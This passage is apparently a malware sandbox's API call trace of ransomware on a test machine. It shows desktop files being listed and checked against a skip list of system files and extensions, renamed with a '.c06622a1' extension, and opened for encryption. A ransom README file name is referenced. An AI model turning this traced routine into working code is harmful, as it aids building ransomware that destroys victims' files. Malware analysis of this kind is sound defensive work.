halpmcxz\\desktop\\ziqq01cnhjjwr\\h5q20omlty.mp3.c06622a1"), dwFlags=0x8) returned 1 [0156.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\h5q20omlty.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0156.613] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.613] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x287db5b0 [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5dfe0ac1 [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x48a5b69d [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfb4cd85 [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e789b02 [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3836defe [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x403110ad [0156.621] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2108bb82 [0156.624] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0xf36a4c2a [0156.624] RtlComputeCrc32 (PartialCrc=0x4c2a, Buffer=0x3480094, Length=0x80) returned 0x4c96b2f4 [0156.624] RtlComputeCrc32 (PartialCrc=0xb2f4, Buffer=0x3480094, Length=0x80) returned 0xefa2e135 [0156.624] RtlComputeCrc32 (PartialCrc=0xe135, Buffer=0x3480094, Length=0x80) returned 0x6d048ee4 [0156.624] RtlComputeCrc32 (PartialCrc=0x8ee4, Buffer=0x3480094, Length=0x80) returned 0x626cbac5 [0156.624] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0156.624] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.624] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.624] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cea1560, ftCreationTime.dwHighDateTime=0x1d5d81d, ftLastAccessTime.dwLowDateTime=0x9055ad00, ftLastAccessTime.dwHighDateTime=0x1d5e64a, ftLastWriteTime.dwLowDateTime=0x9055ad00, ftLastWriteTime.dwHighDateTime=0x1d5e64a, nFileSizeHigh=0x0, nFileSizeLow=0x1ca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="itDojnXHYr_bMbkK1b.mp3", cAlternateFileName="ITDOJN~1.MP3")) returned 1 [0156.624] _wcsicmp (_Str1="itDojnXHYr_bMbkK1b.mp3", _Str2="README.c06622a1.TXT") returned -9 [0156.624] wcsstr (_Str="itDojnXHYr_bMbkK1b.mp3", _SubStr="README") returned 0x0 [0156.624] _wcsicmp (_Str1="autorun.inf", _Str2="itDojnXHYr_bMbkK1b.mp3") returned -8 [0156.624] wcslen (_String="autorun.inf") returned 0xb [0156.624] _wcsicmp (_Str1="boot.ini", _Str2="itDojnXHYr_bMbkK1b.mp3") returned -7 [0156.624] wcslen (_String="boot.ini") returned 0x8 [0156.624] _wcsicmp (_Str1="bootfont.bin", _Str2="itDojnXHYr_bMbkK1b.mp3") returned -7 [0156.624] wcslen (_String="bootfont.bin") returned 0xc [0156.625] _wcsicmp (_Str1="bootsect.bak", _Str2="itDojnXHYr_bMbkK1b.mp3") returned -7 [0156.625] wcslen (_String="bootsect.bak") returned 0xc [0156.625] _wcsicmp (_Str1="desktop.ini", _Str2="itDojnXHYr_bMbkK1b.mp3") returned -5 [0156.625] wcslen (_String="desktop.ini") returned 0xb [0156.625] _wcsicmp (_Str1="iconcache.db", _Str2="itDojnXHYr_bMbkK1b.mp3") returned -17 [0156.625] wcslen (_String="iconcache.db") returned 0xc [0156.625] _wcsicmp (_Str1="ntldr", _Str2="itDojnXHYr_bMbkK1b.mp3") returned 5 [0156.625] wcslen (_String="ntldr") returned 0x5 [0156.625] _wcsicmp (_Str1="ntuser.dat", _Str2="itDojnXHYr_bMbkK1b.mp3") returned 5 [0156.625] wcslen (_String="ntuser.dat") returned 0xa [0156.625] _wcsicmp (_Str1="ntuser.dat.log", _Str2="itDojnXHYr_bMbkK1b.mp3") returned 5 [0156.625] wcslen (_String="ntuser.dat.log") returned 0xe [0156.625] _wcsicmp (_Str1="ntuser.ini", _Str2="itDojnXHYr_bMbkK1b.mp3") returned 5 [0156.625] wcslen (_String="ntuser.ini") returned 0xa [0156.625] _wcsicmp (_Str1="thumbs.db", _Str2="itDojnXHYr_bMbkK1b.mp3") returned 11 [0156.625] wcslen (_String="thumbs.db") returned 0x9 [0156.625] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0156.625] wcslen (_String="386") returned 0x3 [0156.625] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0156.625] wcslen (_String="adv") returned 0x3 [0156.625] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0156.625] wcslen (_String="ani") returned 0x3 [0156.625] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0156.625] wcslen (_String="bat") returned 0x3 [0156.625] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0156.625] wcslen (_String="bin") returned 0x3 [0156.625] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0156.625] wcslen (_String="cab") returned 0x3 [0156.625] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0156.626] wcslen (_String="cmd") returned 0x3 [0156.626] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0156.626] wcslen (_String="com") returned 0x3 [0156.626] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0156.626] wcslen (_String="cpl") returned 0x3 [0156.626] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0156.626] wcslen (_String="cur") returned 0x3 [0156.626] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0156.626] wcslen (_String="deskthemepack") returned 0xd [0156.626] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0156.626] wcslen (_String="diagcab") returned 0x7 [0156.626] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0156.626] wcslen (_String="diagcfg") returned 0x7 [0156.626] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0156.626] wcslen (_String="diagpkg") returned 0x7 [0156.626] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0156.626] wcslen (_String="dll") returned 0x3 [0156.626] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0156.626] wcslen (_String="drv") returned 0x3 [0156.626] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0156.626] wcslen (_String="exe") returned 0x3 [0156.626] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0156.626] wcslen (_String="hlp") returned 0x3 [0156.626] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0156.626] wcslen (_String="icl") returned 0x3 [0156.626] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0156.626] wcslen (_String="icns") returned 0x4 [0156.626] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0156.626] wcslen (_String="ico") returned 0x3 [0156.627] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0156.627] wcslen (_String="ics") returned 0x3 [0156.627] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0156.627] wcslen (_String="idx") returned 0x3 [0156.627] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0156.627] wcslen (_String="ldf") returned 0x3 [0156.627] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0156.627] wcslen (_String="lnk") returned 0x3 [0156.627] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0156.627] wcslen (_String="mod") returned 0x3 [0156.627] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0156.627] wcslen (_String="mpa") returned 0x3 [0156.627] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0156.627] wcslen (_String="msc") returned 0x3 [0156.627] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0156.627] wcslen (_String="msp") returned 0x3 [0156.627] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0156.627] wcslen (_String="msstyles") returned 0x8 [0156.627] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0156.627] wcslen (_String="msu") returned 0x3 [0156.627] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0156.627] wcslen (_String="nls") returned 0x3 [0156.627] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0156.627] wcslen (_String="nomedia") returned 0x7 [0156.627] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0156.627] wcslen (_String="ocx") returned 0x3 [0156.627] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0156.627] wcslen (_String="prf") returned 0x3 [0156.627] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0156.627] wcslen (_String="ps1") returned 0x3 [0156.628] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0156.628] wcslen (_String="rom") returned 0x3 [0156.628] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0156.628] wcslen (_String="rtp") returned 0x3 [0156.628] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0156.628] wcslen (_String="scr") returned 0x3 [0156.628] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0156.628] wcslen (_String="shs") returned 0x3 [0156.628] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0156.628] wcslen (_String="spl") returned 0x3 [0156.628] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0156.628] wcslen (_String="sys") returned 0x3 [0156.628] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0156.628] wcslen (_String="theme") returned 0x5 [0156.628] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0156.628] wcslen (_String="themepack") returned 0x9 [0156.628] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0156.628] wcslen (_String="wpx") returned 0x3 [0156.628] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0156.628] wcslen (_String="lock") returned 0x4 [0156.628] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0156.628] wcslen (_String="key") returned 0x3 [0156.628] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0156.628] wcslen (_String="hta") returned 0x3 [0156.628] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0156.628] wcslen (_String="msi") returned 0x3 [0156.628] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0156.628] wcslen (_String="pdb") returned 0x3 [0156.628] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0156.628] wcslen (_String="sqlite") returned 0x6 [0156.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.629] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.629] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.629] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.629] wcscpy (in: _Dest=0x32400d0, _Source="itDojnXHYr_bMbkK1b.mp3" | out: _Dest="itDojnXHYr_bMbkK1b.mp3") returned="itDojnXHYr_bMbkK1b.mp3" [0156.629] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3", dwFileAttributes=0x80) returned 1 [0156.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\itdojnxhyr_bmbkk1b.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0156.629] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.629] ReadFile (in: hFile=0x1f0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.630] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xf229255f [0156.630] RtlComputeCrc32 (PartialCrc=0x255f, Buffer=0x32e9a4, Length=0x80) returned 0x238eba76 [0156.630] RtlComputeCrc32 (PartialCrc=0xba76, Buffer=0x32e9a4, Length=0x80) returned 0x3c3712a4 [0156.630] RtlComputeCrc32 (PartialCrc=0x12a4, Buffer=0x32e9a4, Length=0x80) returned 0xa4b618d8 [0156.630] RtlComputeCrc32 (PartialCrc=0x18d8, Buffer=0x32e9a4, Length=0x80) returned 0x12860f7c [0156.630] CloseHandle (hObject=0x1f0) returned 1 [0156.630] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.630] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3" [0156.630] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3") returned 0x4e [0156.630] wcscpy (in: _Dest=0x3250104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.631] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\itdojnxhyr_bmbkk1b.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\itdojnxhyr_bmbkk1b.mp3.c06622a1"), dwFlags=0x8) returned 1 [0156.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\itDojnXHYr_bMbkK1b.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\itdojnxhyr_bmbkk1b.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0156.646] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.646] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0156.653] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3c1f085 [0156.654] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x718a6acd [0156.654] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d200219 [0156.654] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x49606393 [0156.654] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x223bc777 [0156.654] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4abbaf9c [0156.654] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4c90b3c8 [0156.654] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3047cdbb [0156.657] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x4b7bd3c2 [0156.657] RtlComputeCrc32 (PartialCrc=0xd3c2, Buffer=0x3510094, Length=0x80) returned 0x45034aea [0156.657] RtlComputeCrc32 (PartialCrc=0x4aea, Buffer=0x3510094, Length=0x80) returned 0x57863c77 [0156.657] RtlComputeCrc32 (PartialCrc=0x3c77, Buffer=0x3510094, Length=0x80) returned 0x4179d6e4 [0156.657] RtlComputeCrc32 (PartialCrc=0xd6e4, Buffer=0x3510094, Length=0x80) returned 0x3fa3b4a5 [0156.657] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0156.658] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.658] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.658] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb15a5440, ftCreationTime.dwHighDateTime=0x1d5d8cd, ftLastAccessTime.dwLowDateTime=0x545c8b30, ftLastAccessTime.dwHighDateTime=0x1d5da69, ftLastWriteTime.dwLowDateTime=0x545c8b30, ftLastWriteTime.dwHighDateTime=0x1d5da69, nFileSizeHigh=0x0, nFileSizeLow=0x3e66, dwReserved0=0x0, dwReserved1=0x0, cFileName="M8sIlcr9Kip1-hC9n.bmp", cAlternateFileName="M8SILC~1.BMP")) returned 1 [0156.658] _wcsicmp (_Str1="M8sIlcr9Kip1-hC9n.bmp", _Str2="README.c06622a1.TXT") returned -5 [0156.658] wcsstr (_Str="M8sIlcr9Kip1-hC9n.bmp", _SubStr="README") returned 0x0 [0156.658] _wcsicmp (_Str1="autorun.inf", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned -12 [0156.658] wcslen (_String="autorun.inf") returned 0xb [0156.658] _wcsicmp (_Str1="boot.ini", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned -11 [0156.658] wcslen (_String="boot.ini") returned 0x8 [0156.658] _wcsicmp (_Str1="bootfont.bin", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned -11 [0156.658] wcslen (_String="bootfont.bin") returned 0xc [0156.658] _wcsicmp (_Str1="bootsect.bak", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned -11 [0156.658] wcslen (_String="bootsect.bak") returned 0xc [0156.658] _wcsicmp (_Str1="desktop.ini", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned -9 [0156.658] wcslen (_String="desktop.ini") returned 0xb [0156.658] _wcsicmp (_Str1="iconcache.db", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned -4 [0156.658] wcslen (_String="iconcache.db") returned 0xc [0156.658] _wcsicmp (_Str1="ntldr", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned 1 [0156.658] wcslen (_String="ntldr") returned 0x5 [0156.658] _wcsicmp (_Str1="ntuser.dat", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned 1 [0156.658] wcslen (_String="ntuser.dat") returned 0xa [0156.658] _wcsicmp (_Str1="ntuser.dat.log", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned 1 [0156.658] wcslen (_String="ntuser.dat.log") returned 0xe [0156.658] _wcsicmp (_Str1="ntuser.ini", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned 1 [0156.658] wcslen (_String="ntuser.ini") returned 0xa [0156.658] _wcsicmp (_Str1="thumbs.db", _Str2="M8sIlcr9Kip1-hC9n.bmp") returned 7 [0156.658] wcslen (_String="thumbs.db") returned 0x9 [0156.658] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0156.658] wcslen (_String="386") returned 0x3 [0156.658] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0156.659] wcslen (_String="adv") returned 0x3 [0156.659] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0156.659] wcslen (_String="ani") returned 0x3 [0156.659] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0156.659] wcslen (_String="bat") returned 0x3 [0156.659] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0156.659] wcslen (_String="bin") returned 0x3 [0156.659] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0156.659] wcslen (_String="cab") returned 0x3 [0156.659] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0156.659] wcslen (_String="cmd") returned 0x3 [0156.659] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0156.659] wcslen (_String="com") returned 0x3 [0156.659] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0156.659] wcslen (_String="cpl") returned 0x3 [0156.659] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0156.659] wcslen (_String="cur") returned 0x3 [0156.659] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0156.659] wcslen (_String="deskthemepack") returned 0xd [0156.659] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0156.659] wcslen (_String="diagcab") returned 0x7 [0156.659] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0156.659] wcslen (_String="diagcfg") returned 0x7 [0156.659] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0156.659] wcslen (_String="diagpkg") returned 0x7 [0156.659] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0156.659] wcslen (_String="dll") returned 0x3 [0156.659] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0156.659] wcslen (_String="drv") returned 0x3 [0156.659] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0156.659] wcslen (_String="exe") returned 0x3 [0156.659] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0156.659] wcslen (_String="hlp") returned 0x3 [0156.659] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0156.659] wcslen (_String="icl") returned 0x3 [0156.659] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0156.659] wcslen (_String="icns") returned 0x4 [0156.660] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0156.660] wcslen (_String="ico") returned 0x3 [0156.660] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0156.660] wcslen (_String="ics") returned 0x3 [0156.660] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0156.660] wcslen (_String="idx") returned 0x3 [0156.660] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0156.660] wcslen (_String="ldf") returned 0x3 [0156.660] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0156.660] wcslen (_String="lnk") returned 0x3 [0156.660] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0156.660] wcslen (_String="mod") returned 0x3 [0156.660] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0156.660] wcslen (_String="mpa") returned 0x3 [0156.660] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0156.660] wcslen (_String="msc") returned 0x3 [0156.660] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0156.660] wcslen (_String="msp") returned 0x3 [0156.660] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0156.660] wcslen (_String="msstyles") returned 0x8 [0156.660] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0156.660] wcslen (_String="msu") returned 0x3 [0156.660] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0156.660] wcslen (_String="nls") returned 0x3 [0156.660] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0156.660] wcslen (_String="nomedia") returned 0x7 [0156.660] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0156.660] wcslen (_String="ocx") returned 0x3 [0156.660] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0156.660] wcslen (_String="prf") returned 0x3 [0156.660] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0156.660] wcslen (_String="ps1") returned 0x3 [0156.660] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0156.660] wcslen (_String="rom") returned 0x3 [0156.660] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0156.660] wcslen (_String="rtp") returned 0x3 [0156.661] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0156.661] wcslen (_String="scr") returned 0x3 [0156.661] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0156.661] wcslen (_String="shs") returned 0x3 [0156.661] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0156.661] wcslen (_String="spl") returned 0x3 [0156.661] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0156.661] wcslen (_String="sys") returned 0x3 [0156.661] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0156.661] wcslen (_String="theme") returned 0x5 [0156.661] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0156.661] wcslen (_String="themepack") returned 0x9 [0156.661] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0156.661] wcslen (_String="wpx") returned 0x3 [0156.661] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0156.661] wcslen (_String="lock") returned 0x4 [0156.661] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0156.661] wcslen (_String="key") returned 0x3 [0156.661] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0156.661] wcslen (_String="hta") returned 0x3 [0156.661] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0156.661] wcslen (_String="msi") returned 0x3 [0156.661] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0156.661] wcslen (_String="pdb") returned 0x3 [0156.661] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0156.661] wcslen (_String="sqlite") returned 0x6 [0156.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.661] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.661] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.661] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.662] wcscpy (in: _Dest=0x32400d0, _Source="M8sIlcr9Kip1-hC9n.bmp" | out: _Dest="M8sIlcr9Kip1-hC9n.bmp") returned="M8sIlcr9Kip1-hC9n.bmp" [0156.662] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp", dwFileAttributes=0x80) returned 1 [0156.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\m8silcr9kip1-hc9n.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 